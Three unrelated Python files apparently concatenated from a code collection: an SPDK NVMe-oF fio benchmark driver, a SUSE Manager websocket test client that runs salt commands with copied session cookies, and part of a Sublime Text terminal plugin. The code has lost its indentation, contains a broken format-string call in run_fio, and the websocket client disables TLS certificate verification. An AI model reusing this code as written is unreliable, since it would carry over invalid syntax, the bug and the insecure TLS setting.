percentile_list=50:90:99:99.5:99.9:99.99:99.999
norandommap=1
rw={rw}
rwmixread={rwmixread}
bs={block_size}
time_based=1
ramp_time={ramp_time}
runtime={run_time}
"""
if "spdk" in self.mode:
bdev_conf = self.gen_spdk_bdev_conf(self.subsystem_info_list)
self.exec_cmd(["echo", "'%s'" % bdev_conf, ">", "%s/bdev.conf" % self.spdk_dir])
ioengine = "%s/build/fio/spdk_bdev" % self.spdk_dir
spdk_conf = "spdk_json_conf=%s/bdev.conf" % self.spdk_dir
else:
ioengine = "libaio"
spdk_conf = ""
out = self.exec_cmd(["sudo", "nvme", "list", "|", "grep", "-E", "'SPDK|Linux'",
"|", "awk", "'{print $1}'"])
subsystems = [x for x in out.split("\n") if "nvme" in x]
if self.cpus_allowed is not None:
self.log_print("Limiting FIO workload execution on specific cores %s" % self.cpus_allowed)
cpus_num = 0
cpus = self.cpus_allowed.split(",")
for cpu in cpus:
if "-" in cpu:
a, b = cpu.split("-")
a = int(a)
b = int(b)
                    cpus_num += len(range(a, b)) + 1  # "a-b" is an inclusive CPU range
else:
cpus_num += 1
self.num_cores = cpus_num
threads = range(0, self.num_cores)
elif hasattr(self, 'num_cores'):
self.log_print("Limiting FIO workload execution to %s cores" % self.num_cores)
threads = range(0, int(self.num_cores))
else:
self.num_cores = len(subsystems)
threads = range(0, len(subsystems))
if "spdk" in self.mode:
filename_section = self.gen_fio_filename_conf(self.subsystem_info_list, threads, io_depth, num_jobs)
else:
filename_section = self.gen_fio_filename_conf(threads, io_depth, num_jobs)
fio_config = fio_conf_template.format(ioengine=ioengine, spdk_conf=spdk_conf,
rw=rw, rwmixread=rwmixread, block_size=block_size,
ramp_time=ramp_time, run_time=run_time)
if num_jobs:
fio_config = fio_config + "numjobs=%s \n" % num_jobs
if self.cpus_allowed is not None:
fio_config = fio_config + "cpus_allowed=%s \n" % self.cpus_allowed
fio_config = fio_config + "cpus_allowed_policy=%s \n" % self.cpus_allowed_policy
fio_config = fio_config + filename_section
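        # Encode the workload parameters in the file name (e.g. 4k_128_randrw_m_70.fio);
        # parse_results() later recovers the rwmixread value by regexing this name.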
fio_config_filename = "%s_%s_%s_m_%s" % (block_size, io_depth, rw, rwmixread)
if hasattr(self, "num_cores"):
fio_config_filename += "_%sCPU" % self.num_cores
fio_config_filename += ".fio"
self.exec_cmd(["mkdir", "-p", "%s/nvmf_perf" % self.spdk_dir])
self.exec_cmd(["echo", "'%s'" % fio_config, ">", "%s/nvmf_perf/%s" % (self.spdk_dir, fio_config_filename)])
self.log_print("Created FIO Config:")
self.log_print(fio_config)
return os.path.join(self.spdk_dir, "nvmf_perf", fio_config_filename)
def set_cpu_frequency(self):
if self.cpu_frequency is not None:
try:
self.exec_cmd(["sudo", "cpupower", "frequency-set", "-g", "userspace"], True)
self.exec_cmd(["sudo", "cpupower", "frequency-set", "-f", "%s" % self.cpu_frequency], True)
self.log_print(self.exec_cmd(["sudo", "cpupower", "frequency-info"]))
except Exception:
self.log_print("ERROR: cpu_frequency will not work when intel_pstate is enabled!")
sys.exit()
else:
self.log_print("WARNING: you have disabled intel_pstate and using default cpu governance.")
def run_fio(self, fio_config_file, run_num=None):
job_name, _ = os.path.splitext(fio_config_file)
self.log_print("Starting FIO run for job: %s" % job_name)
self.log_print("Using FIO: %s" % self.fio_bin)
if run_num:
for i in range(1, run_num + 1):
output_filename = job_name + "_run_" + str(i) + "_" + self.name + ".json"
output = self.exec_cmd(["sudo", self.fio_bin,
fio_config_file, "--output-format=json",
"--output=%s" % output_filename], True)
self.log_print(output)
else:
output_filename = job_name + "_" + self.name + ".json"
output = self.exec_cmd(["sudo", self.fio_bin,
fio_config_file, "--output-format=json",
"--output" % output_filename], True)
self.log_print(output)
self.log_print("FIO run finished. Results in: %s" % output_filename)
def sys_config(self):
self.log_print("====Kernel release:====")
self.log_print(self.exec_cmd(["uname", "-r"]))
self.log_print("====Kernel command line:====")
cmdline = self.exec_cmd(["cat", "/proc/cmdline"])
self.log_print('\n'.join(self.get_uncommented_lines(cmdline.splitlines())))
self.log_print("====sysctl conf:====")
sysctl = self.exec_cmd(["cat", "/etc/sysctl.conf"])
self.log_print('\n'.join(self.get_uncommented_lines(sysctl.splitlines())))
self.log_print("====Cpu power info:====")
self.log_print(self.exec_cmd(["cpupower", "frequency-info"]))
class KernelTarget(Target):
def __init__(self, name, general_config, target_config):
super(KernelTarget, self).__init__(name, general_config, target_config)
# Defaults
self.nvmet_bin = "nvmetcli"
if "nvmet_bin" in target_config:
self.nvmet_bin = target_config["nvmet_bin"]
def __del__(self):
nvmet_command(self.nvmet_bin, "clear")
def kernel_tgt_gen_subsystem_conf(self, nvme_list, address_list):
nvmet_cfg = {
"ports": [],
"hosts": [],
"subsystems": [],
}
# Split disks between NIC IP's
disks_per_ip = int(len(nvme_list) / len(address_list))
disk_chunks = [nvme_list[i * disks_per_ip:disks_per_ip + disks_per_ip * i] for i in range(0, len(address_list))]
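        # e.g. 4 disks across 2 IPs -> chunks nvme_list[0:2] and nvme_list[2:4]; any
        # remainder disks that do not divide evenly are simply left unused.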
subsys_no = 1
port_no = 0
for ip, chunk in zip(address_list, disk_chunks):
for disk in chunk:
nqn = "nqn.2018-09.io.spdk:cnode%s" % subsys_no
nvmet_cfg["subsystems"].append({
"allowed_hosts": [],
"attr": {
"allow_any_host": "1",
"serial": "SPDK00%s" % subsys_no,
"version": "1.3"
},
"namespaces": [
{
"device": {
"path": disk,
"uuid": "%s" % uuid.uuid4()
},
"enable": 1,
"nsid": subsys_no
}
],
"nqn": nqn
})
nvmet_cfg["ports"].append({
"addr": {
"adrfam": "ipv4",
"traddr": ip,
"trsvcid": "%s" % (4420 + port_no),
"trtype": "%s" % self.transport
},
"portid": subsys_no,
"referrals": [],
"subsystems": [nqn]
})
subsys_no += 1
port_no += 1
self.subsystem_info_list.append([port_no, nqn, ip])
with open("kernel.conf", "w") as fh:
fh.write(json.dumps(nvmet_cfg, indent=2))
pass
def tgt_start(self):
self.log_print("Configuring kernel NVMeOF Target")
if self.null_block:
print("Configuring with null block device.")
null_blk_list = ["/dev/nullb{}".format(x) for x in range(self.null_block)]
self.kernel_tgt_gen_subsystem_conf(null_blk_list, self.nic_ips)
self.subsys_no = len(null_blk_list)
else:
print("Configuring with NVMe drives.")
nvme_list = get_nvme_devices()
self.kernel_tgt_gen_subsystem_conf(nvme_list, self.nic_ips)
self.subsys_no = len(nvme_list)
nvmet_command(self.nvmet_bin, "clear")
nvmet_command(self.nvmet_bin, "restore kernel.conf")
if self.enable_adq:
self.adq_configure_tc()
self.log_print("Done configuring kernel NVMeOF Target")
class SPDKTarget(Target):
def __init__(self, name, general_config, target_config):
super(SPDKTarget, self).__init__(name, general_config, target_config)
# Required fields
self.core_mask = target_config["core_mask"]
self.num_cores = self.get_num_cores(self.core_mask)
# Defaults
self.dif_insert_strip = False
self.null_block_dif_type = 0
self.num_shared_buffers = 4096
if "num_shared_buffers" in target_config:
self.num_shared_buffers = target_config["num_shared_buffers"]
if "null_block_dif_type" in target_config:
self.null_block_dif_type = target_config["null_block_dif_type"]
if "dif_insert_strip" in target_config:
self.dif_insert_strip = target_config["dif_insert_strip"]
def get_num_cores(self, core_mask):
if "0x" in core_mask:
return bin(int(core_mask, 16)).count("1")
else:
num_cores = 0
core_mask = core_mask.replace("[", "")
core_mask = core_mask.replace("]", "")
for i in core_mask.split(","):
if "-" in i:
x, y = i.split("-")
num_cores += len(range(int(x), int(y))) + 1
else:
num_cores += 1
return num_cores
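# Illustrative examples of the core-mask parsing above (assumed inputs):
#   get_num_cores("0xF")     -> 4   (four bits set in the hex mask)
#   get_num_cores("[0-3,8]") -> 5   (range 0-3 is inclusive, plus core 8)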
def spdk_tgt_configure(self):
self.log_print("Configuring SPDK NVMeOF target via RPC")
numa_list = get_used_numa_nodes()
# Create RDMA transport layer
rpc.nvmf.nvmf_create_transport(self.client, trtype=self.transport,
num_shared_buffers=self.num_shared_buffers,
dif_insert_or_strip=self.dif_insert_strip,
sock_priority=self.adq_priority)
self.log_print("SPDK NVMeOF transport layer:")
rpc.client.print_dict(rpc.nvmf.nvmf_get_transports(self.client))
if self.null_block:
self.spdk_tgt_add_nullblock(self.null_block)
self.spdk_tgt_add_subsystem_conf(self.nic_ips, self.null_block)
else:
self.spdk_tgt_add_nvme_conf()
self.spdk_tgt_add_subsystem_conf(self.nic_ips)
if self.enable_adq:
self.adq_configure_tc()
self.log_print("Done configuring SPDK NVMeOF Target")
def spdk_tgt_add_nullblock(self, null_block_count):
md_size = 0
block_size = 4096
if self.null_block_dif_type != 0:
md_size = 128
self.log_print("Adding null block bdevices to config via RPC")
for i in range(null_block_count):
self.log_print("Setting bdev protection to :%s" % self.null_block_dif_type)
rpc.bdev.bdev_null_create(self.client, 102400, block_size + md_size, "Nvme{}n1".format(i),
dif_type=self.null_block_dif_type, md_size=md_size)
self.log_print("SPDK Bdevs configuration:")
rpc.client.print_dict(rpc.bdev.bdev_get_bdevs(self.client))
def spdk_tgt_add_nvme_conf(self, req_num_disks=None):
self.log_print("Adding NVMe bdevs to config via RPC")
bdfs = get_nvme_devices_bdf()
bdfs = [b.replace(":", ".") for b in bdfs]
if req_num_disks:
if req_num_disks > len(bdfs):
self.log_print("ERROR: Requested number of disks is more than available %s" % len(bdfs))
sys.exit(1)
else:
bdfs = bdfs[0:req_num_disks]
for i, bdf in enumerate(bdfs):
rpc.bdev.bdev_nvme_attach_controller(self.client, name="Nvme%s" % i, trtype="PCIe", traddr=bdf)
self.log_print("SPDK Bdevs configuration:")
rpc.client.print_dict(rpc.bdev.bdev_get_bdevs(self.client))
def spdk_tgt_add_subsystem_conf(self, ips=None, req_num_disks=None):
self.log_print("Adding subsystems to config")
port = "4420"
if not req_num_disks:
req_num_disks = get_nvme_devices_count()
# Distribute bdevs between provided NICs
num_disks = range(0, req_num_disks)
if len(num_disks) == 1:
disks_per_ip = 1
else:
disks_per_ip = int(len(num_disks) / len(ips))
disk_chunks = [num_disks[i * disks_per_ip:(i + 1) * disks_per_ip] for i in range(0, len(ips))]
# Create subsystems, add bdevs to namespaces, add listeners
for ip, chunk in zip(ips, disk_chunks):
for c in chunk:
nqn = "nqn.2018-09.io.spdk:cnode%s" % c
serial = "SPDK00%s" % c
bdev_name = "Nvme%sn1" % c
rpc.nvmf.nvmf_create_subsystem(self.client, nqn, serial,
allow_any_host=True, max_namespaces=8)
rpc.nvmf.nvmf_subsystem_add_ns(self.client, nqn, bdev_name)
rpc.nvmf.nvmf_subsystem_add_listener(self.client, nqn,
trtype=self.transport,
traddr=ip,
trsvcid=port,
adrfam="ipv4")
self.subsystem_info_list.append([port, nqn, ip])
self.log_print("SPDK NVMeOF subsystem configuration:")
rpc.client.print_dict(rpc.nvmf.nvmf_get_subsystems(self.client))
def tgt_start(self):
if self.null_block:
self.subsys_no = 1
else:
self.subsys_no = get_nvme_devices_count()
self.log_print("Starting SPDK NVMeOF Target process")
nvmf_app_path = os.path.join(self.spdk_dir, "build/bin/nvmf_tgt")
proc = subprocess.Popen([nvmf_app_path, "--wait-for-rpc", "-m", self.core_mask])
self.pid = os.path.join(self.spdk_dir, "nvmf.pid")
with open(self.pid, "w") as fh:
fh.write(str(proc.pid))
self.nvmf_proc = proc
self.log_print("SPDK NVMeOF Target PID=%s" % self.pid)
self.log_print("Waiting for spdk to initilize...")
while True:
if os.path.exists("/var/tmp/spdk.sock"):
break
time.sleep(1)
self.client = rpc.client.JSONRPCClient("/var/tmp/spdk.sock")
if self.enable_zcopy:
rpc.sock.sock_impl_set_options(self.client, impl_name="posix",
enable_zerocopy_send=True)
self.log_print("Target socket options:")
rpc.client.print_dict(rpc.sock.sock_impl_get_options(self.client, impl_name="posix"))
if self.enable_adq:
rpc.sock.sock_impl_set_options(self.client, impl_name="posix", enable_placement_id=1)
rpc.bdev.bdev_nvme_set_options(self.client, timeout_us=0, action_on_timeout=None,
nvme_adminq_poll_period_us=100000, retry_count=4)
rpc.nvmf.nvmf_set_config(self.client, acceptor_poll_rate=10000)
rpc.app.framework_set_scheduler(self.client, name=self.scheduler_name)
rpc.framework_start_init(self.client)
self.spdk_tgt_configure()
def __del__(self):
if hasattr(self, "nvmf_proc"):
try:
self.nvmf_proc.terminate()
self.nvmf_proc.wait()
except Exception as e:
self.log_print(e)
self.nvmf_proc.kill()
self.nvmf_proc.communicate()
class KernelInitiator(Initiator):
def __init__(self, name, general_config, initiator_config):
super(KernelInitiator, self).__init__(name, general_config, initiator_config)
# Defaults
self.extra_params = ""
if "extra_params" in initiator_config:
self.extra_params = initiator_config["extra_params"]
def __del__(self):
self.ssh_connection.close()
def kernel_init_connect(self, address_list, subsys_no):
self.log_print("Below connection attempts may result in error messages, this is expected!")
for subsystem in self.subsystem_info_list:
self.log_print("Trying to connect %s %s %s" % subsystem)
self.exec_cmd(["sudo", self.nvmecli_bin, "connect", "-t", self.transport,
"-s", subsystem[0], "-n", subsystem[1], "-a", subsystem[2], self.extra_params])
time.sleep(2)
def kernel_init_disconnect(self, address_list, subsys_no):
for subsystem in self.subsystem_info_list:
self.exec_cmd(["sudo", self.nvmecli_bin, "disconnect", "-n", subsystem[1]])
time.sleep(1)
def gen_fio_filename_conf(self, threads, io_depth, num_jobs=1):
out = self.exec_cmd(["sudo", "nvme", "list", "|", "grep", "-E", "'SPDK|Linux'",
"|", "awk", "'{print $1}'"])
nvme_list = [x for x in out.split("\n") if "nvme" in x]
filename_section = ""
nvme_per_split = int(len(nvme_list) / len(threads))
remainder = len(nvme_list) % len(threads)
iterator = iter(nvme_list)
result = []
for i in range(len(threads)):
result.append([])
for j in range(nvme_per_split):
result[i].append(next(iterator))
if remainder:
result[i].append(next(iterator))
remainder -= 1
for i, r in enumerate(result):
header = "[filename%s]" % i
disks = "\n".join(["filename=%s" % x for x in r])
job_section_qd = round((io_depth * len(r)) / num_jobs)
if job_section_qd == 0:
job_section_qd = 1
iodepth = "iodepth=%s" % job_section_qd
filename_section = "\n".join([filename_section, header, disks, iodepth])
return filename_section
class SPDKInitiator(Initiator):
def __init__(self, name, general_config, initiator_config):
super(SPDKInitiator, self).__init__(name, general_config, initiator_config)
if "skip_spdk_install" not in general_config or general_config["skip_spdk_install"] is False:
self.install_spdk(self.spdk_dir)
# Required fields
self.num_cores = initiator_config["num_cores"]
def install_spdk(self, local_spdk_zip):
self.log_print("Using fio binary %s" % self.fio_bin)
self.exec_cmd(["git", "-C", self.spdk_dir, "submodule", "update", "--init"])
self.exec_cmd(["git", "-C", self.spdk_dir, "clean", "-ffdx"])
self.exec_cmd(["cd", self.spdk_dir, "&&", "./configure", "--with-rdma", "--with-fio=%s" % os.path.dirname(self.fio_bin)])
self.exec_cmd(["make", "-C", self.spdk_dir, "clean"])
self.exec_cmd(["make", "-C", self.spdk_dir, "-j$(($(nproc)*2))"])
self.log_print("SPDK built")
self.exec_cmd(["sudo", "%s/scripts/setup.sh" % self.spdk_dir])
def gen_spdk_bdev_conf(self, remote_subsystem_list):
bdev_cfg_section = {
"subsystems": [
{
"subsystem": "bdev",
"config": []
}
]
}
for i, subsys in enumerate(remote_subsystem_list):
sub_port, sub_nqn, sub_addr = map(lambda x: str(x), subsys)
nvme_ctrl = {
"method": "bdev_nvme_attach_controller",
"params": {
"name": "Nvme{}".format(i),
"trtype": self.transport,
"traddr": sub_addr,
"trsvcid": sub_port,
"subnqn": sub_nqn,
"adrfam": "IPv4"
}
}
if self.enable_adq:
nvme_ctrl["params"].update({"priority": "1"})
bdev_cfg_section["subsystems"][0]["config"].append(nvme_ctrl)
return json.dumps(bdev_cfg_section, indent=2)
def gen_fio_filename_conf(self, subsystems, threads, io_depth, num_jobs=1):
filename_section = ""
if len(threads) >= len(subsystems):
threads = range(0, len(subsystems))
filenames = ["Nvme%sn1" % x for x in range(0, len(subsystems))]
nvme_per_split = int(len(subsystems) / len(threads))
remainder = len(subsystems) % len(threads)
iterator = iter(filenames)
result = []
for i in range(len(threads)):
result.append([])
for j in range(nvme_per_split):
result[i].append(next(iterator))
if remainder:
result[i].append(next(iterator))
remainder -= 1
for i, r in enumerate(result):
header = "[filename%s]" % i
disks = "\n".join(["filename=%s" % x for x in r])
job_section_qd = round((io_depth * len(r)) / num_jobs)
if job_section_qd == 0:
job_section_qd = 1
iodepth = "iodepth=%s" % job_section_qd
filename_section = "\n".join([filename_section, header, disks, iodepth])
return filename_section
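# Illustrative output of gen_fio_filename_conf() above (assumed arguments): with
# 3 subsystems, threads=[0, 1], io_depth=128 and num_jobs=1, the bdevs split as
# [["Nvme0n1", "Nvme1n1"], ["Nvme2n1"]] and the returned section is roughly:
#
#   [filename0]
#   filename=Nvme0n1
#   filename=Nvme1n1
#   iodepth=256
#   [filename1]
#   filename=Nvme2n1
#   iodepth=128
#
# (iodepth is scaled by the number of filenames in each job section.)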
if __name__ == "__main__":
spdk_zip_path = "/tmp/spdk.zip"
target_results_dir = "/tmp/results"
if len(sys.argv) > 1:
config_file_path = sys.argv[1]
else:
script_full_dir = os.path.dirname(os.path.realpath(__file__))
config_file_path = os.path.join(script_full_dir, "config.json")
print("Using config file: %s" % config_file_path)
with open(config_file_path, "r") as config:
data = json.load(config)
initiators = []
fio_cases = []
general_config = data["general"]
target_config = data["target"]
initiator_configs = [data[x] for x in data.keys() if "initiator" in x]
for k, v in data.items():
if "target" in k:
if data[k]["mode"] == "spdk":
target_obj = SPDKTarget(k, data["general"], v)
elif data[k]["mode"] == "kernel":
target_obj = KernelTarget(k, data["general"], v)
pass
elif "initiator" in k:
if data[k]["mode"] == "spdk":
init_obj = SPDKInitiator(k, data["general"], v)
elif data[k]["mode"] == "kernel":
init_obj = KernelInitiator(k, data["general"], v)
initiators.append(init_obj)
elif "fio" in k:
fio_workloads = itertools.product(data[k]["bs"],
data[k]["qd"],
data[k]["rw"])
fio_run_time = data[k]["run_time"]
fio_ramp_time = data[k]["ramp_time"]
fio_rw_mix_read = data[k]["rwmixread"]
fio_run_num = data[k]["run_num"] if "run_num" in data[k].keys() else None
fio_num_jobs = data[k]["num_jobs"] if "num_jobs" in data[k].keys() else None
else:
continue
target_obj.tgt_start()
try:
os.mkdir(target_results_dir)
except FileExistsError:
pass
for i in initiators:
i.discover_subsystems(i.target_nic_ips, target_obj.subsys_no)
if i.enable_adq:
i.adq_configure_tc()
# Poor man's threading
# Run FIO tests
for block_size, io_depth, rw in fio_workloads:
threads = []
configs = []
for i in initiators:
if i.mode == "kernel":
i.kernel_init_connect(i.target_nic_ips, target_obj.subsys_no)
cfg = i.gen_fio_config(rw, fio_rw_mix_read, block_size, io_depth, target_obj.subsys_no,
fio_num_jobs, fio_ramp_time, fio_run_time)
configs.append(cfg)
for i, cfg in zip(initiators, configs):
t = threading.Thread(target=i.run_fio, args=(cfg, fio_run_num))
threads.append(t)
if target_obj.enable_sar:
sar_file_name = "_".join([str(block_size), str(rw), str(io_depth), "sar"])
sar_file_name = ".".join([sar_file_name, "txt"])
t = threading.Thread(target=target_obj.measure_sar, args=(target_results_dir, sar_file_name))
threads.append(t)
if target_obj.enable_pcm:
pcm_fnames = ["%s_%s_%s_%s.csv" % (block_size, rw, io_depth, x) for x in ["pcm_cpu", "pcm_memory", "pcm_power"]]
pcm_cpu_t = threading.Thread(target=target_obj.measure_pcm, args=(target_results_dir, pcm_fnames[0],))
pcm_mem_t = threading.Thread(target=target_obj.measure_pcm_memory, args=(target_results_dir, pcm_fnames[1],))
pcm_pow_t = threading.Thread(target=target_obj.measure_pcm_power, args=(target_results_dir, pcm_fnames[2],))
threads.append(pcm_cpu_t)
threads.append(pcm_mem_t)
threads.append(pcm_pow_t)
if target_obj.enable_bandwidth:
bandwidth_file_name = "_".join(["bandwidth", str(block_size), str(rw), str(io_depth)])
bandwidth_file_name = ".".join([bandwidth_file_name, "csv"])
t = threading.Thread(target=target_obj.measure_network_bandwidth, args=(target_results_dir, bandwidth_file_name,))
threads.append(t)
if target_obj.enable_dpdk_memory:
t = threading.Thread(target=target_obj.measure_dpdk_memory, args=(target_results_dir,))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
for i in initiators:
if i.mode == "kernel":
i.kernel_init_disconnect(i.target_nic_ips, target_obj.subsys_no)
i.copy_result_files(target_results_dir)
target_obj.restore_governor()
target_obj.restore_tuned()
target_obj.restore_services()
target_obj.restore_sysctl()
for i in initiators:
i.restore_governor()
i.restore_tuned()
i.restore_services()
i.restore_sysctl()
target_obj.parse_results(target_results_dir)
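# Illustrative sketch of the config.json layout consumed by the __main__ block
# above. Only the section keys and the options read in this file are taken from
# the code; the concrete values and any other required fields of the base
# Target/Initiator classes are assumptions:
#
# {
#   "general": {"skip_spdk_install": false},
#   "target": {"mode": "spdk", "core_mask": "0xF", "num_shared_buffers": 4096},
#   "initiator1": {"mode": "kernel", "extra_params": ""},
#   "fio": {"bs": ["4k"], "qd": [128], "rw": ["randrw"], "rwmixread": 70,
#           "run_time": 300, "ramp_time": 30, "run_num": 3, "num_jobs": 1}
# }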
|
websoctest.py
|
# (c) Copyright 2017-2018 SUSE LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Requires:
# https://pypi.python.org/pypi/websocket-client/
# pip install websocket-client
# usage:
# python -i ws.py
# pprint outputs
# run_salt_command('udev.exportdb', '*')
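# Illustrative session (assumed host name and cookie; requires a reachable
# SUSE Manager instance with the environment variables below exported):
#   $ export MANAGER_URL=https://manager.example.com
#   $ export MANAGER_COOKIE='pxt-session-cookie=...'
#   $ python -i websoctest.py
#   >>> run_salt_command('test.ping', '*')
#   >>> pprint(outputs)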
import json
import os
import time
import threading
import ssl
import websocket
from pprint import pprint
from urlparse import urlparse
websocket.enableTrace(True)
ws = None
outputs = []
# login from the browser, and copy cookies, it should be something like this
#cookie = "DWRSESSIONID=c27VBRxV8fY4yD4wRbBICchKXQl; JSESSIONID=06B1EC5AC4243FEF33C842C32C8F158E; pxt-session-cookie=93x3b9a09b6e8662064fef12f11ce232817ef2358e05e22f5807ad9016ad85ccc21 "
cookie = os.environ['MANAGER_COOKIE']
parsed = urlparse(os.environ['MANAGER_URL'])
managerhostport = parsed.hostname
def on_error(ws, error):
print 'error:', error
def on_close(ws):
print "### closed ###"
def on_open(ws):
print "### opened ###"
def run_salt_command(cmd, on):
ws.send(json.dumps(dict(
preview=False,
target=on,
command='salt-call --local --log-level quiet --out=json %s' % cmd
)))
def on_message(ws, message):
message = json.loads(message)
print message
outputs.append(message)
def retry(close=True):
global ws
if close:
ws.close()
connto = "wss://%s/rhn/websocket/minion/remote-commands" % managerhostport
ws = websocket.WebSocketApp(connto,
cookie=cookie,
on_message=on_message,
on_error=on_error,
on_close=on_close,
)
ws.on_open = on_open
kwargs = {'sslopt': {"cert_reqs": ssl.CERT_NONE}}
threading.Thread(target=ws.run_forever, kwargs=kwargs).start()
time.sleep(10)
ws.send(json.dumps({'preview': True, 'target': '*'}))
retry(False)
|
terminal.py
|
import sublime
import os
import time
import base64
import logging
import tempfile
import threading
from queue import Queue, Empty
from .ptty import TerminalPtyProcess, TerminalScreen, TerminalStream
from .utils import panel_window, view_size, responsive, intermission
from .key import get_key_code
from .image import get_image_info, image_resize
CONTINUATION = "\u200b\u200c\u200b"
IMAGE = """
<style>
body {{
margin: 1px;
}}
</style>
<img src="data:image/{what};base64,{data}" width="{width}" height="{height}"/>
"""
logger = logging.getLogger('Terminus')
class Terminal:
_terminals = {}
_detached_terminals = []
def __init__(self, view=None):
self._title = ""
self.view = view
self._cached_cursor = [0, 0]
self._cached_cursor_is_hidden = [True]
self.image_count = 0
self.images = {}
self._strings = Queue()
self._pending_to_send_string = [False]
self.lock = threading.Lock()
@classmethod
def from_id(cls, vid):
if vid not in cls._terminals:
return None
return cls._terminals[vid]
@classmethod
def from_tag(cls, tag):
for terminal in cls._terminals.values():
if terminal.tag == tag:
return terminal
return None
def attach_view(self, view, offset=None):
with self.lock:
self.view = view
self.detached = False
Terminal._terminals[view.id()] = self
if self in Terminal._detached_terminals:
Terminal._detached_terminals.remove(self)
self.view.settings().erase("terminus_view.detached")
# allow screen to be rerendered
self.screen.dirty.update(range(self.screen.lines))
self.set_offset(offset)
def detach_view(self):
with self.lock:
self.detached = True
Terminal._detached_terminals.append(self)
if self.view.id() in Terminal._terminals:
del Terminal._terminals[self.view.id()]
self.view.settings().set("terminus_view.detached", True)
self.view = None
def _need_to_render(self):
flag = False
if self.screen.dirty:
flag = True
elif self.screen.cursor.x != self._cached_cursor[0] or \
self.screen.cursor.y != self._cached_cursor[1]:
flag = True
elif self.screen.cursor.hidden != self._cached_cursor_is_hidden[0]:
flag = True
if flag:
self._cached_cursor[0] = self.screen.cursor.x
self._cached_cursor[1] = self.screen.cursor.y
self._cached_cursor_is_hidden[0] = self.screen.cursor.hidden
return flag
def _start_rendering(self):
data = [""]
done = [False]
@responsive(period=1, default=True)
def view_is_attached():
if self.detached:
# irrelevant if terminal is detached
return True
if self.panel_name:
return panel_window(self.view)
else:
return self.view.window()
@responsive(period=1, default=False)
def was_resized():
size = view_size(self.view)
return self.screen.lines != size[0] or self.screen.columns != size[1]
def reader():
while True:
try:
temp = self.process.read(1024)
except EOFError:
break
with self.lock:
data[0] += temp
if done[0] or not view_is_attached():
logger.debug("reader breaks")
break
done[0] = True
threading.Thread(target=reader).start()
def renderer():
def feed_data():
if len(data[0]) > 0:
logger.debug("receieved: {}".format(data[0]))
self.stream.feed(data[0])
data[0] = ""
while True:
with intermission(period=0.03), self.lock:
feed_data()
if not self.detached:
if was_resized():
self.handle_resize()
self.view.run_command("terminus_show_cursor")
if self._need_to_render():
self.view.run_command("terminus_render")
if done[0] or not view_is_attached():
logger.debug("renderer breaks")
break
feed_data()
done[0] = True
sublime.set_timeout(lambda: self.cleanup())
threading.Thread(target=renderer).start()
def set_offset(self, offset=None):
if offset is not None:
self.offset = offset
else:
if self.view and self.view.size() > 0:
view = self.view
self.offset = view.rowcol(view.size())[0] + 1
else:
self.offset = 0
logger.debug("activating with offset %s", self.offset)
def activate(
self, cmd, cwd=None, env=None, title=None,
panel_name=None, tag=None, auto_close=True):
view = self.view
if view:
self.detached = False
Terminal._terminals[view.id()] = self
else:
Terminal._detached_terminals.append(self)
self.detached = True
self.panel_name = panel_name
self.tag = tag
self.auto_close = auto_close
self.default_title = title
if view:
self.title = title
self.set_offset()
size = view_size(view or sublime.active_window().active_view())
if size == (1, 1):
size = (24, 80)
logger.debug("view size: {}".format(str(size)))
_env = os.environ.copy()
_env.update(env)
self.process = TerminalPtyProcess.spawn(cmd, cwd=cwd, env=_env, dimensions=size)
self.screen = TerminalScreen(size[1], size[0], process=self.process, history=10000)
self.stream = TerminalStream(self.screen)
self.screen.set_show_image_callback(self.show_image)
self._start_rendering()
def close(self):
logger.debug("close")
vid = self.view.id()
if vid in self._terminals:
del self._terminals[vid]
self.process.terminate()
def cleanup(self):
logger.debug("cleanup")
self.view.run_command("terminus_render")
# process might be still alive but view was detached
# make sure the process is terminated
self.close()
self.view.run_command(
"append",
{"characters": "\nprocess is terminated with return code {}.".format(
self.process.exitstatus)})
self.view.set_read_only(True)
if self.process.exitstatus == 0 and self.auto_close:
self.view.run_command("terminus_close")
def handle_resize(self):
size = view_size(self.view)
logger.debug("handle resize {} {} -> {} {}".format(
self.screen.lines, self.screen.columns, size[0], size[1]))
self.process.setwinsize(*size)
self.screen.resize(*size)
@property
def title(self):
return self._title
@title.setter
def title(self, value):
if not self.detached:
self._title = value
self.view.set_name(value)
def send_key(self, *args, **kwargs):
kwargs["application_mode"] = self.application_mode_enabled()
kwargs["new_line_mode"] = self.new_line_mode_enabled()
self.send_string(get_key_code(*args, **kwargs), normalized=False)
def send_string(self, string, normalized=True):
if normalized:
# normalize LF and CRLF to CR (or CRLF if LNM)
string = string.replace("\r\n", "\n")
if self.new_line_mode_enabled():
string = string.replace("\n", "\r\n")
else:
string = string.replace("\n", "\r")
no_queue = not self._pending_to_send_string[0]
if no_queue and len(string) <= 512:
logger.debug("sent: {}".format(string[0:64] if len(string) > 64 else string))
self.process.write(string)
else:
for i in range(0, len(string), 512):
self._strings.put(string[i:i+512])
if no_queue:
self._pending_to_send_string[0] = True
threading.Thread(target=self.process_send_string).start()
def process_send_string(self):
while True:
try:
string = self._strings.get(False)
logger.debug("sent: {}".format(string[0:64] if len(string) > 64 else string))
self.process.write(string)
except Empty:
self._pending_to_send_string[0] = False
return
else:
time.sleep(0.1)
def bracketed_paste_mode_enabled(self):
return (2004 << 5) in self.screen.mode
def new_line_mode_enabled(self):
return (20 << 5) in self.screen.mode
def application_mode_enabled(self):
return (1 << 5) in self.screen.mode
def find_image(self, pt):
view = self.view
for pid in self.images:
region = view.query_phantom(pid)[0]
if region.end() == pt:
return pid
return None
def show_image(self, data, args, cr=None):
view = self.view
if "inline" not in args or not args["inline"]:
return
cursor = self.screen.cursor
pt = view.text_point(self.offset + cursor.y, cursor.x)
databytes = base64.decodebytes(data.encode())
image_info = get_image_info(databytes)
if not image_info:
logger.error("cannot get image info")
return
what, width, height = image_info
_, image_path = tempfile.mkstemp(suffix="." + what)
with open(image_path, "wb") as f:
f.write(databytes)
width, height = image_resize(
width,
height,
args["width"] if "width" in args else None,
args["height"] if "height" in args else None,
view.em_width(),
view.viewport_extent()[0] - 3 * view.em_width(),
args["preserveAspectRatio"] if "preserveAspectRatio" in args else 1
)
if self.find_image(pt):
self.view.run_command("terminus_insert", {"point": pt, "character": " "})
pt += 1
